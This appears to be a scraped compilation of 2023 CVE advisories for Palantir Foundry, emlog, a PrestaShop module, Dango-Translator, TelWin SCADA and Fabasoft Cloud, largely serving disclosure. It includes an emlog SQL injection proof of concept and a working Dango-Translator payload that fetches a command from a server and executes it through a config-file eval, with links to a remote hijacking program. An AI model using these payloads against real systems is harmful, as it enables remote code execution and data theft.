The Foundry Magritte plugin rest-source was found to be vulnerable to an an XML external Entity attack (XXE). 

CVE-2023-30951: Palantir | Trust and Security Portal

A security defect was discovered in Foundry Issues that enabled users to create convincing phishing links by editing the request sent when creating an Issue. This defect was resolved in Frontend release 6.228.0 .

CVE-2023-30952: Palantir | Trust and Security Portal

A security defect was identified in Foundry Frontend that enabled users to potentially conduct DOM XSS attacks if Foundry's CSP were to be bypassed.

This defect was resolved with the release of Foundry Frontend 6.225.0.



CVE-2023-30958: Palantir | Trust and Security Portal

The foundry campaigns service was found to be vulnerable to an unauthenticated information disclosure in a rest endpoint

CVE-2023-30950: Palantir | Trust and Security Portal

A local user could edit the VideoEdge configuration file and interfere with VideoEdge operation.

CVE-2023-3749

emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php.

1.  First log in to the administrator's background home page, find System -> Data -> Click Start Backup, first get an sql file  
    http://127.0.0.1/emlog/admin/data.php
2.  Modify the sql file and add a line of code to the user table of the database

POC:  
INSERT INTO emlog\_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select user()),'writer','n','','123@qq.com','','','0','1687261845','1687261845');  
3\. Save the sql file - > and then select Import sql file, select the modified sql file just now, click Import, if successful, the import success will be displayed, and then click User module  
http://127.0.0.1/emlog/admin/user.php, you'll find the SQL statement is executed successfully

CVE-2023-39121: There is sql injection in the background of emlog 2.1.9. · Issue #1 · safe-b/CVE

ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

In the module “Customization fields fee for your store” (aioptimizedcombinations) for PrestaShop, an attacker can perform a SQL injection up to 0.1.2. Release 0.1.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-33666
*   **Published at**: 2023-08-03
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: aioptimizedcombinations
*   **Impacted release**: <= 0.1.2 (0.1.3 fixed issue)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 0.1.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted attributes variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/modules/aioptimizedcombinations/includes/ajax.php
    +++ b/modules/aioptimizedcombinations/includes/ajax.php
    switch (Tools::getValue('action'))
    {
    	case 'getCombination' :
    		/* If no product or combination, we quit */
    		if (!Tools::getIsset('product') || !Tools::getIsset('attributes'))
    			die();
    
    		$attributes = explode(',', Tools::getValue('attributes'));
    		
    		/* Get combination id */
    		$combination_data = Db::getInstance()->getRow(
    			'SELECT COUNT(*) as number, pa.id_product_attribute FROM '._DB_PREFIX_.'product_attribute AS pa LEFT JOIN '._DB_PREFIX_.'product_attribute_combination AS pac ON pa.id_product_attribute = pac.id_product_attribute WHERE pa.id_product = '.
    -			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.pSQL(Tools::getValue('attributes')).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    +			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.implode(',', array_map('intval', explode(',', Tools::getValue('attributes')))).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    		);
    

**Other recommandations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-05-08

Vunlnerability found during a audit by 202 ecommerce

2023-05-10

Contact the author

2023-05-12

The author confirm the issue and supply a fixed release

2023-05-12

Request a CVE ID

2023-08-03

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-33666: [CVE-2023-33666] Improper neutralization of a SQL parameter in aioptimizedcombinations from ai-dev module for PrestaShop

Dango-Translator v4.5.5 was discovered to contain a remote command execution (RCE) vulnerability via the component app/config/cloud_config.json.

Vulnerability Product: Dango-Translator Ver4.5.5  
Vulnerability version: Ver4.5.5  
Vulnerability type: Hijacked Remote Command Execute  
Vulnerability Details:  
Vulnerability location: app/config/cloud\_config.json

withoud check the xxxUse variable in app/config/cloud\_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute  
  

client payload : "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"  
remote hijacking program : https://github.com/Leeyangee/leeya\_bug/raw/main/DangoTranslator\_payload/testProject/testProject.exe  
remote hijacking program original code : https://github.com/Leeyangee/leeya\_bug/tree/main/DangoTranslator\_payload/testProject

**PROVE:**

Firstly download a Dango-Translator Ver4.5.5  
Run the program to generate config  

Secondly go to app/config/cloud\_config.json, replace value of xxxUse with client payload,  
here replace "tencentwebUse": "False" with  "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"  

Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya\_bug/raw/main/DangoTranslator\_payload/testProject/testProject.exe, and keep the program running  
(This is a remote hijacking program, so you can deploy it on server but need to change IP\_DOMAIN in original\_code and url in client payload and re-compile it)  

Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs "calc" command on the client)  

Once the client login in, the remote hijacking program could detect it and run command on the client

proved Hijacked Remote Command Execute

**REASON:**

the client payload is divided into these parts  

the result of eval(client payload) is it self, because "tencentwebUse" will be evaled before exit  
  

**Harm:**

attackers could replace payload in order to let client respond a shell to attackers  
so attackers could directly obtain shell and get server permissions

discovered by leeya\_bug

CVE-2023-38942: [Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 · Issue #127 · PantsuDango/Dango-Translator


External input could be used on TEL-STER TelWin SCADA WebInterface to construct paths to files and directories without properly neutralizing special elements within the pathname, which could allow an unauthenticated attacker to read files on the system.



CVE-2023-0956

Fabasoft Cloud Enterprise Client 23.3.0.130 allows a user to escalate their privileges to local administrator.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # Vendor ID: PDO06614 # CSNC ID: CSNC-2023-002 # CVE ID: CVE-2023-32764 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Dennis Henke # Date: 08.05.2023 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.3.0.130 / 23.3.130 Not vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.6.0.99 / 23.6.99 Not vulnerable (regarding vendor announcement): \* 23.4.0.66 and above \* 23.0.1.23 and above \* 22.9.0.75 and above \* 22.0.3.88 and above \* 21.1.3.204 and above Other products were affected (Windows only): Fabasoft Folio / eGov-Suite 2021 Update Rollup 3 Fabasoft Folio / eGov-Suite 2022 (up to Update Rollup 3 and Feature Track) Fabasoft Folio / eGov-Suite 2023 (up to Update Rollup 1) Fabasoft Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The update mechanism after successful validation of a signed MSI file is vulnerable. It is possible to place a Fabasoft-signed MSI update or setup file to pass the validation check. After that, the MSI file will be renamed and handed over to the msiexec setup process. During this step, it is possible to re-rename the file and exchange it with an arbitrary MSI package. A commandline script can do the job and performs the renaming operations in a loop to exchange the MSI package once it is possible, before the update process will hand over the file to msiexec. The update process will produce some access errors first, because of the renaming operation, but it has some tolerance and retries to access the file. The exchanged malicious MSI package will be taken, handed over to msiexec and installed with SYSTEM privileges. This means that an unprivileged user can install arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be used, e.g., to start a reverse shell or execute other malicious commands. Workaround / Fix: ----------------- The processing of MSI packages during the update process should be revised to ensure, that it is not possible to exchange any packages originated from untrusted sources. A patch has already been released by the publisher. The update service should install update packages from a folder for which non-admin users do not have change or modify privileges. Microsofts guidelines and best-practices for MSI packages should be considered during development. In general, the update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate" or "folioupdatepm2X". Timeline: --------- 2023-05-08: Discovery by Tino Kautschke and Dennis Henke 2023-05-08: Initial vendor notification 2023-05-08: CVE number requested 2023-05-15: CVE number reserved: CVE-2023-32764 2023-06-09: Test of version 23.6.99, vulnerability has been fixed 2023-07-04: Last public vulnerability announcement by vendor (PDO06614) \[4\] 2023-08-02: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://help.supportservices.fabasoft.com/index.php?topic=doc/Vulnerabilities-Fabasoft-Folio/vulnerabilities-2023.htm#client-autoupdate-harmful-code-installation-vulnerability-pdo06614-

Source

CVE